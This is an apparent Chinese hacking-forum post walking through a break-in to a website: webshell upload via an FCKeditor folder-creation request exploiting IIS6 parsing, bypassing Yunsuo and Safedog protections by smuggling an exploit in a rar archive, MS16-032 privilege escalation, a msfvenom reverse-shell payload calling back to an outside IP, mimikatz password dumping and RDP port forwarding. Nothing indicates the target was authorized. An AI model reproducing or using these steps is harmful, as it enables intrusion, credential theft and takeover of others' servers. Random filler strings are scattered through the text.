找回密码
 立即注册
查看: 3150|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

! ]; g# F; ^. v E' Q4 L! }1 P

) ~$ F) V: i+ _4 `( s& ~5 f# S3 g4 W) @! l& ?- `6 J+ P! g! z k. g; `0 Q. C- x+ X3 T" A2 e1 K3 i0 W1 ?+ K6 m: _1 M1 [$ y5 P1 e1 G! F" Q' v% O z. L% b3 m2 S) m
- F/ A. G7 s( K3 h$ F8 q

; z c7 s) b) ~2 y
9 }9 Y P. S0 `; a% i9 |8 i; m
一、 利用getwebshell
, T$ W% G4 f' K, S- C
9 W- r1 ^" B" j9 w, E) m' h' P
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
( H6 `+ u1 H5 v1 d- s
6 P' R! {; L5 m% I: T( \ 222.png
8 O6 c) p' j( I% B! q
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
' q# |! ^9 G5 g" A6 y3 p 333.png
6 o/ S! g/ j7 ?1 ?$ k2 z8 b
下面我们构造一个asp目录,如: 9 F* T3 Z9 x% C' J% [1 M! ?

0 Y1 i3 d5 Y4 G* v5 T# J

! [+ C0 T* k9 d. b# T6 E http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 : \$ q3 d. k: x

0 N8 W' i' Y0 ^3 _- @

8 u* L1 Z& K9 Z 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
# E* W# _; |! ^2 r
6 ^8 C: E4 S1 l' \% a5 j! g1 C
一、 绕过安全狗云锁提权并且加账号
* D9 v% y8 y5 s/ K 444.png
8 l, `! u# ^5 \. T1 c
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
* ]6 o' G/ f3 [! S8 g3 M
# p! {% b6 L* D. O/ ~& N7 L( |6 |: Z
如图:
]' J$ ~/ |% L+ Y555.png
# m# E0 i# K" P+ H
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
. t3 ]: S; Q. J) o
' e; u+ k; }) W) J% w
一、 利用metasploit
+ p2 ^1 a( V" I" P% E7 N" M
3 k! \* G8 i; s) B; a; E
首先用pentestbox生成一个64位的payload如下命令
& v, W# ]# k& |' N* N% A
3 B2 w6 Q) w8 N1 u* ZmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
# H& r! p. z* N) R. z* A
: W, l' r+ o4 j8 D: i7 w
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
9 e4 H% X% b/ j+ m1 A11.png
3 Z2 h% A# ~/ l! W' D
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
0 l4 _. }% j$ h `* Q" S3 ?" [ 13.png
2 W+ N" o: ?4 q+ X8 ?
下面我们来做一个监听如下命令:
. F" o7 p$ ^" \+ V
. O8 l5 m6 ~# Y" @' j portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
( P+ o$ f/ e& R- P$ s" h 18.png
3 h- x8 T5 ~! b" j; ? \9 e

% k& x! u* _( t& L$ F& P/ ~* g u
( X' i( v& W/ a% v/ Z" h

! k2 E- U# G8 f- R9 w6 U- t! D9 D' [

- J k: X+ E1 U& s- Y
& b6 t( N( ]( p* p! m
+ f/ N6 R; ^9 a, E, w6 y" E! V
+ d3 S9 \; b+ D+ H$ o* d, d! @

: ^* L1 e8 U) F. i
6 E8 t8 ^" R, N( e$ o 6 }+ t- \, H6 P) n; w5 V

) g Q" e0 k1 W" M7 B$ A
$ B5 Q) c! }. C0 S

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表